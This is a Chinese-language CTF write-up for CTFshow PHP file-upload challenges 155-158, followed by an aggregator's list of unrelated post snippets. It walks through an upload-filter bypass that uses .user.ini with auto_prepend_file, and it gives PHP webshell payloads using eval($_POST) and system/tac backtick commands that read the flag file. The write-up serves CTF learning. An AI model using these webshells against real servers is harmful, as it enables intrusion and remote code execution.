当前位置：首页 > news >正文

CTFshow web(php文件上传155-158）

news 2025/12/25 13:46:35

web155

老样子，还是那个后端检测。

知识点：

auto_append_file 是 PHP 配置选项之一，在 PHP 脚本执行结束后自动追加执行指定的文件。

当 auto_append_file 配置被设置为一个文件路径时，PHP 将在执行完脚本文件的所有代码后，自动加载并执行指定的文件。

这个配置选项可以用来在每个 PHP 脚本的结尾处执行一些共享的代码逻辑，例如清理工作、记录日志或执行一些全局操作。这样，就不必在每个脚本中显式编写和调用相同的代码，而是通过配置 auto_append_file 来实现统一的处理。

使用方法如下：

打开 PHP 的配置文件 php.ini。

找到 auto_append_file 配置项。

将要追加执行的文件路径设置给 auto_append_file 配置项，例如：

auto_append_file = "/path/to/your/file.php"
保存文件并重启 PHP 服务。

在接下来的 PHP 脚本执行后，指定的文件将会被自动加载和执行。

实战：先上传 .user.ini 文件，里面写入

auto_prepend_file=111.png
（#上传时是 .user.png ，抓包修改为 .user.ini）

然后创建一个111.png文件，里面写入一句话木马<?php @eval($_POST["x"]); ?>

之后访问/upload/

这里发现在上传111.png时不行，看来是被过滤了，那就换个<?=`tac ../flag*`木马就好了

<? echo 123;eval($_POST['x']); ?>

web156

还是上面的套路，只是在我尝试<? echo 123;eval($_POST['x']); ?>时[]又被禁止了，这里直接换成短标签木马：

<?=`tac ../flag*`

或者直接把[]换成{}也是可以的

其他还是不变

web157

其实不就多过滤了{}这个而已嘛，直接短标签木马上去就好了嘛

其他都和最初155一样

<?system('tac ../f*')?>

web156

上面的<?system('tac ../f*')?>还可以继续白嫖，那么这里我也不测试这道题目比之前多过滤了什么

真诚希望我的文章能够帮助大家，谢谢！

CTFshow web(php文件上传155-158）

web155 老样子，还是那个后端检测。知识点： auto_append_file 是 PHP 配置选项之一，在 PHP 脚本执行结束后自动追加执行指定的文件。当 auto_append_file 配置被设置为一个文件路径时，PHP 将在执行完脚本文件的所有代码后&…...

编程日记 2024/2/15 15:28:05

Leetcode 53 最大子数组和

题意理解： 给你一个整数数组 nums ，请你找出一个具有最大和的连续子数组（子数组最少包含一个元素），返回其最大和。子数组是数组中的一个连续部分。所以每个元素都有两个状态，是前一部分的延续&#xff0…...

编程日记 2024/2/15 15:27:04

【pandas 不同文件读取和存储】

文章目录一、Pandas 文件读取和存储概览二、读取不同类型的文件1. CSV文件的读取与存储代码及解释： 2. Excel文件的读取与存储代码及解释： 3. JSON文件的读取与存储代码及解释： 4. SQL数据库的读取与存储代码及解释： 5. 其他格式…...

编程日记 2024/2/15 15:25:02

python从入门到精通（十六）：python爬虫的BeautifulSoup4

python爬虫的BeautifulSoup4 BeautifulSoup4导入模块解析文件创建对象python解析器beautifulsoup对象的种类Tag获取整个标签获取标签里的属性和属性值Navigablestring 获取标签里的内容BeautifulSoup获取整个文档Comment输出的内容不包含注释符号BeautifulSoup文档遍历Beautifu…...

编程日记 2024/2/15 15:23:58

Codeforces Round 924(Div.2) A~E

A.Rectangle Cutting (模拟) 题意： 给出一个长方形，通过平行于原始矩形的一条边进行切割，将该矩形切割成两个边长为整数的矩形。询问是否能通过旋转和移动这两个矩形，得到新的矩形。分析： 可以发现拼成的新长方形…...

编程日记 2024/2/15 15:21:56

django中实现观察者模式

在Django中实现观察者模式，你可以利用Django的信号（Signals）系统。Django的信号提供了一种发布/订阅模型，允许解耦应用程序组件之间的交互。一个组件可以发送一个信号，而其他组件可以监听这个信号并响应它。下面是如…...

编程日记 2024/2/15 15:20:55

Elasticsearch中的动态DSL解决方案

目录问题背景解决方案编写es的mapper 动态dsl编写使用mapper获取动态dsl 远程调用restful api查询问题背景在大数据量的业务系统中，一般都会引入Elasticsearch来作为搜索引擎，而搜索的条件又是多种多样的。回顾下，如果是mysql等…...

编程日记 2024/2/15 15:18:53

【操作系统】MacOS虚拟内存统计指标

目录命令及其结果参数解读有趣的实验在 macOS 系统中，虚拟内存统计指标提供了对系统内存使用情况和虚拟内存操作的重要洞察。通过分析这些指标，我们可以更好地了解系统的性能状况和内存管理情况。命令及其结果 >>> vm_stat Mach Virtu…...

编程日记 2024/2/15 15:17:52

LeetCode:67.二进制求和

67. 二进制求和 - 力扣（LeetCode） 又是一道求和题，% / 在求和的用途了解了些， 目录题目： 思路分析： 博主代码: 官方代码： 每日表情包： 题目： 思路分析&#xf…...

编程日记 2024/2/15 15:13:47

参考文档： How to check and fix file permissions on Grid Infrastructure environment (Doc ID 1931142.1) -- 验证二进制文件的权限 [gridnode19c01 ~]$ cluvfy comp software -n node19c01 -verbosePerforming following verification checks ...Software …...

编程日记 2024/2/15 15:12:46

OJ刷题：杨氏矩阵【建议收藏】

看见这个题目，很多人的第一反应是遍历整个数组查找数字，但是这种方法不仅效率低，而且远远不能满足题目要求。下面介绍一种高效的查找方法： 代码实现： #include <stdio.h>int Yang_Find_Num(int arr[][3], int …...

编程日记 2024/2/15 15:10:44

2024-02-13 Unity 编辑器开发之编辑器拓展4 —— EditorGUIUtility

文章目录 1 EditorGUIUtility 介绍2 加载资源2.1 Eidtor Default Resources2.2 不存在返回 null2.3 不存在则报错2.4 代码示例 3 搜索框查询、对象选中提示3.1 ShowObjectPicker3.2 PingObject3.3 代码示例 4 窗口事件传递、坐标转换4.1 CommandEvent4.2 GUIPoint 和 ScreenPoi…...

编程日记 2024/2/15 15:09:43

redis加锁实现方式

思考是否有官方推荐（自己先思考如何实现，然后再参考其他人的实践，总结优缺点）通过哪些方式可以实现锁锁是否具有原子性锁请求失败了如何处理如果避免发生死锁如果避免发生资源抢占如果避免锁的误删官方实现策略安全性能&#…...

编程日记 2024/2/15 15:06:39

ClickHouse--08--SQL DDL 操作

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录 SQL DDL 操作1 创建库2 查看数据库3 删除库4 创建表5 查看表6 查看表的定义7 查看表的字段8 删除表9 修改表9.1 添加列9.2 删除列9.3 清空列9.4 给列修改注释9.5 修…...

编程日记 2024/2/15 15:01:31

5种风格非常经典的免费wordpress主题

免费wordpress主题下载高端大气上档次的wordpress主题，也可以是免费的，可以在线免费下载。 https://www.wpniu.com/themes/288.html wordpress免费主题高端大气的wordpress免费主题，LOGO在顶部左侧，导航菜单在顶部右侧。 ht…...

编程日记 2024/2/15 14:56:25

「数据结构」哈希表2：实现哈希表

🎇个人主页：Ice_Sugar_7 🎇所属专栏：Java数据结构 🎇欢迎点赞收藏加关注哦！ 实现哈希表 🍉扩容🍉插入🍉获取value🍉源码 🍉扩容在讲插入之前需要…...

编程日记 2024/2/15 14:52:21

ITK 图像分割（一）：阈值ThresholdImageFilter

效果： Video: 区域增加分割 1、itkThresholdImageFilter 该类的主要功能是通过设置低阈值、高阈值或介于高低阈值之间，则将图像值输出为用户指定的值。如果图像值低于、高于或介于设置的阈值之间，该类就将图像值设置为用户指定的“外部”值…...

编程日记 2024/2/15 14:50:18

2023.2.6

#include<stdio.h> #include<string.h> //冒泡排序 void bubb(int arr[],int len) {for(int i1;i<len;i){for(int j0;j<len-i1;j){if(arr[j1]<arr[j]){int tarr[j];arr[j]arr[j1];arr[j1]t;}}} } //select排序 void select(int arr[],int len) {int min0;…...

编程日记 2024/2/15 14:49:17

例39：使用List控件

建立一个EXE工程，在窗体上放一个文本框，一个列表框和三个按钮输入如下的代码： Sub Form1_Command1_BN_Clicked(hWndForm As hWnd, hWndControl As hWnd)List1.AddItem(Text1.Text)End SubSub Form1_Command2_BN_Clicked(hWndForm As hWnd, h…...

编程日记 2024/2/15 14:46:14

浏览器内核的主要功能模块介绍

浏览器内核是浏览器的核心部分，负责解析网页内容、渲染页面和处理用户交互。一个典型的浏览器内核主要包括以下几个功能模块： 1. **解析器（Parser）**： 解析器负责解析网页内容，包括HTML…...

编程日记 2024/2/15 14:42:11

超短脉冲激光自聚焦效应

前言与目录强激光引起自聚焦效应机理超短脉冲激光在脆性材料内部加工时引起的自聚焦效应，这是一种非线性光学现象，主要涉及光学克尔效应和材料的非线性光学特性。自聚焦效应可以产生局部的强光场，对材料产生非线性响应，可能…...

编程新知 2025/12/25 13:24:13

【OSG学习笔记】Day 18: 碰撞检测与物理交互

物理引擎（Physics Engine） 物理引擎是一种通过计算机模拟物理规律（如力学、碰撞、重力、流体动力学等）的软件工具或库。它的核心目标是在虚拟环境中逼真地模拟物体的运动和交互，广泛应用于游戏开发、动画制作、虚…...

编程新知 2025/12/25 5:37:07

Python爬虫实战：研究feedparser库相关技术

1. 引言 1.1 研究背景与意义在当今信息爆炸的时代，互联网上存在着海量的信息资源。RSS（Really Simple Syndication）作为一种标准化的信息聚合技术，被广泛用于网站内容的发布和订阅。通过 RSS，用户可以方便地获取网站更新的内容，而无需频繁访问各个网站。然而，互联网…...

编程新知 2025/8/18 9:54:31